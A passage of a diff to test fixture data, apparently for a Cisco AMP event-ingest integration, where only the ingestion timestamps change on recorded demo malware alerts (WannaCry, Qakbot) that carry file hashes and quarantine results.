Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", "code": "1107296278", "kind": "alert", 
@@ -1078,7 +1078,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:55.388927300Z", + "ingested": "2021-12-14T14:41:01.444862944Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583861114428195000,\"timestamp\":1610626750,\"timestamp_nanoseconds\":161000000,\"date\":\"2021-01-14T12:19:10+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", 
@@ -1152,7 +1152,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:55.388933100Z", + "ingested": "2021-12-14T14:41:01.444863484Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264747552596296000,\"timestamp\":1610626264,\"timestamp_nanoseconds\":27000000,\"date\":\"2021-01-14T12:11:04+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}", "code": "553648173", "kind": "alert", 
@@ -1249,7 +1249,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388938800Z", + "ingested": "2021-12-14T14:41:01.444863943Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":756000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.A280012EEE.in10.tht.Talos\",\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"X4.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\X4.exe\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\",\"sha1\":\"c235e18bae63d6c4b5daadb833686f943de65a5f\",\"md5\":\"a659ff79ef7ffacbd61d4c2641379e44\"},\"parent\":{\"process_id\":4744,\"disposition\":\"Clean\",\"file_name\":\"wscript.exe\",\"identity\":{\"sha256\":\"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97\",\"sha1\":\"2131cff0959d213cd9a5e8a8ac362d265d5b1316\",\"md5\":\"045451fa238a75305cc26ac982472367\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -1327,7 +1327,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388944600Z", + "ingested": "2021-12-14T14:41:01.444864448Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":772000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\"}}}}", "code": "553648143", "kind": "alert", 
@@ -1399,7 +1399,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388950400Z", + "ingested": "2021-12-14T14:41:01.444864923Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":208000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -1496,7 +1496,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388956100Z", + "ingested": "2021-12-14T14:41:01.444865460Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":193000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -1599,7 +1599,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388960200Z", + "ingested": "2021-12-14T14:41:01.444865850Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":853000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -1677,7 +1677,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388964700Z", + "ingested": "2021-12-14T14:41:01.444866298Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":884000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", 
@@ -1741,7 +1741,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:55.388969800Z", + "ingested": "2021-12-14T14:41:01.444866740Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583853374897127000,\"timestamp\":1610624948,\"timestamp_nanoseconds\":562000000,\"date\":\"2021-01-14T11:49:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", 
@@ -1810,7 +1810,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:55.388974600Z", + "ingested": "2021-12-14T14:41:01.444867143Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043963,\"timestamp\":1610624472,\"timestamp_nanoseconds\":496121997,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "code": "1107296272", "kind": "alert", 
@@ -1892,7 +1892,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:55.388994900Z", + "ingested": "2021-12-14T14:41:01.444867732Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043964,\"timestamp\":1610624472,\"timestamp_nanoseconds\":498576872,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "code": "1107296258", "kind": "alert", 
@@ -1969,7 +1969,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:55.388998300Z", + "ingested": "2021-12-14T14:41:01.444868211Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671599780921000,\"timestamp\":1610623726,\"timestamp_nanoseconds\":440000000,\"date\":\"2021-01-14T11:28:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\"}}}}", "code": "553648155", "kind": "alert", 
@@ -2051,7 +2051,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:55.389051900Z", + "ingested": "2021-12-14T14:41:01.444868603Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671595485954000,\"timestamp\":1610623725,\"timestamp_nanoseconds\":899000000,\"date\":\"2021-01-14T11:28:45+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.FCE5B6784D-100.SBX.TG\",\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"pp32.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\pp32.exe\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\",\"sha1\":\"bdb11107a33eaeded6a838eb2a0e6167637dbe9c\",\"md5\":\"5df0c4ebca109779dc8afc745d612637\"}}}}", "code": "553648147", "kind": "alert", 
@@ -2125,7 +2125,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389059300Z", + "ingested": "2021-12-14T14:41:01.444869090Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":453000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -2213,7 +2213,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389063900Z", + "ingested": "2021-12-14T14:41:01.444869485Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":437000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -2287,7 +2287,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389067900Z", + "ingested": "2021-12-14T14:41:01.444869988Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -2363,7 +2363,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389071100Z", + "ingested": "2021-12-14T14:41:01.444870506Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":361000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179213462437901\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete 